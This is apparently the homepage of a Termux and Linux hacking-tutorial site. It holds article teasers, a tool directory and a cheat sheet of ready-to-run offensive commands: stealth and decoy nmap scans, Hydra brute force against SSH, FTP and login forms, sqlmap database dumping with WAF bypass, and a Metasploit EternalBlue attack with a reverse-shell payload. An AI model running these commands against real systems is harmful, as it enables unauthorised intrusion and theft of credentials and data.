💻
GEEKTIMES
Linux & Termux Intelligence
All
Termux
Recon
Exploitation
Network
Password
Wireless
Scripting
Web Hacking
Forensics
Android
Beginner
Termux
Linux
Tools
Termux Cheatsheet From Basic To Advanced 2026, Learn From Scratch
Transform your Android device into a full Linux hacking machine. Metasploit, Nmap, Hydra, SQLmap and 45 more tools — running on your phone, no root required.
Recon
Nmap on Termux — Full Network Scanner Setup Guide
Password
Hydra & Hashcat — Password Cracking on Android
Web Hacking
SQLmap Full Tutorial — DB Injection via Termux
Wireless
WiFi Auditing With aircrack-ng & Wifite on Linux
Latest TutorialsToday
View All
🗺️9 min
Linux
Nmap Cheat Sheet 2026 — Every Flag, Script & Scan Type With Examples
Complete reference — OS detection, version scanning, NSE scripts, stealth scans, timing templates and firewall evasion for pentesters.
88K3.1K
🔑7 min
Termux
Install & Use Hydra on Termux — Brute Force Any Service From Android
Step-by-step — installing THC-Hydra on Termux and running brute-force against SSH, FTP, HTTP, SMB with no root required.
64K2.4K
💉11 min
Web Hacking
SQLmap on Termux — Complete Injection Tutorial With WAF Bypass
Every injection technique — union-based, time-blind, error-based — plus WAF evasion and full database dumping from Android.
107K4.8K
📡8 min
Network
TShark on Linux — Capture & Analyse Packets Like a Pro
TShark provides all Wireshark power from the CLI. Filters, capture files, live analysis — works on Termux too.
41K1.6K
🐍6 min
Scripting
Python Automation Scripts For Termux — 20 Useful One-Liners
20 ready-to-use Python scripts — port scanners, mass downloaders, text parsers, API callers. Copy-paste and run from Android terminal.
52K2.2K
Command Reference
Full Cheatsheet
nmap — Common ScansCopy
# Host discovery
nmap -sn 192.168.1.0/24
# Full stealth scan with version + OS
nmap -sS -sV -O -A -T4 192.168.1.1
# All ports
nmap -p- --open -T5 192.168.1.1
# Run all vuln scripts
nmap --script vuln 192.168.1.1
# Firewall evasion with decoys
nmap -D RND:10 -f -sS 192.168.1.1termux — Essential CommandsCopy
# Update all packages
pkg update && pkg upgrade -y
# Install hacking tools
pkg install nmap hydra sqlmap git python
# Setup Python environment
pip install requests scapy impacket
# Run SSH server
sshd && ssh localhost -p 8022
# Access Android storage
termux-setup-storage
ls ~/storage/shared/hydra — Brute Force ExamplesCopy
# SSH brute force
hydra -l admin -P passwords.txt ssh://192.168.1.1
# HTTP POST form
hydra -l admin -P rockyou.txt 192.168.1.1 \
http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
# FTP with username list
hydra -L users.txt -P passwords.txt ftp://192.168.1.1
# 64 threads + verbose
hydra -t 64 -v -l root -P /sdcard/pass.txt ssh://10.0.0.1sqlmap — Injection CommandsCopy
# Basic URL test
sqlmap -u "http://target.com/page?id=1"
# Dump all databases
sqlmap -u "http://target.com/?id=1" --dbs
# Dump specific table
sqlmap -u "URL" -D dbname -T users --dump
# WAF bypass with tamper
sqlmap -u "URL" --tamper=space2comment,charencode --level=5metasploit — MSF ConsoleCopy
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > run
meterpreter > sysinfoLinux Tools Directory340+ Tools
Full Directory
Nmap
Network discovery & security auditing — world’s most popular port scanner
#recon #network #portscanner
Metasploit Framework
The world’s most used pentesting platform with 2000+ exploit modules
#exploit #pentest #msf
SQLmap
Automatic SQL injection detection & exploitation with 30+ techniques
#web #sqli #database
Hydra
Fast online password cracking — 50+ protocols supported
#bruteforce #password #auth
Wireshark / TShark
World’s best network protocol analyser — GUI & CLI packet capture
#network #pcap #traffic
Burp Suite CE
Web security testing platform — intercept, scan & exploit web apps
#web #proxy #scanner
Hashcat
World’s fastest CPU/GPU password recovery — 300+ hash types
#password #hash #cracking
Aircrack-ng
Complete WiFi security suite — capture & crack WEP/WPA/WPA2
#wifi #wireless #wpa
Gobuster / Feroxbuster
Directory & subdomain brute-forcing — Go-powered, 100K req/s
#web #dirbusting #recon
Termux Tutorials
View All
🐚9m
Termux
Custom Zsh + Oh-My-Zsh Setup on Termux
Powerlevel10k theme, autosuggestions and syntax highlighting.
33K
🤖6m
Automation
Run Python Bots 24/7 on Android With Termux + Cron
Set up cron jobs to keep Python scripts running continuously.
27K
🔒11m
Security
Run Metasploit on Termux — Full Install & First Exploit
Complete guide installing and running Metasploit on Android.
91K
🌍8m
Network
Setup OpenVPN & Tor on Termux — Stay Anonymous
Route all Termux traffic through Tor or OpenVPN on Android.
45K